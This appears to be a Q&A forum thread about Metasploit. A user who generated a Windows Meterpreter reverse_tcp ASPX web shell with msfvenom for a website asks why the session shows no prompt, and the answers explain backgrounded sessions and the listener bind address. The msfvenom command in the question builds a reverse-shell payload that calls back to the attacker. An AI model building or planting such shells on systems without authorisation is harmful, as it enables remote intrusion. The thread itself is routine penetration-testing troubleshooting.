# Metasploit opens Meterpreter but shows no prompt please help

Tags: web-application, metasploit, meterpreter

I have created a payload to a website with msfvenom, and started the `exploit/multi/handler` listener, they then connect to each other and create a meterpreter session as seen below.
The problem is, I do not get the meterpreter prompt which I should get and typing any commands just moves me back into the `msf exploit(handler)` prompt. Has anyone ever experienced this before? I am using Parrot OS and the payload is created with the following command:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
```

[image]

Answer (score 8, accepted):

The Meterpreter session has gone to the background, which is default behaviour for Metasploit now.

#### To view the background sessions:

```
sessions -l
```

#### To interact with the session:

```
sessions -i <session id>
```

Comment: I ran into the same issue, but unfortunately I cannot interact with metasploit in any way, in this state. Except `ctrl-c`ing out of it. What am I missing? -.-

Comment: Ah, I see, I can/have to actually ctrl-c out first... really confusing.

Comment: The only way I can run this is by ctrl-c-ing out, but then it doesn't show a session.

Answer (score 0):

Using `Ctrl + C` and then `session -i` wont help, since the connection has been dropped already and executing meterpreter commands will return unknown.

Just set `ReverseListenerBindAddress` along with `LHOST`, this solved the issue for me.

PS: `ReverseListenerBindAddress` gotta be same value as LHOST in reverse_tcp.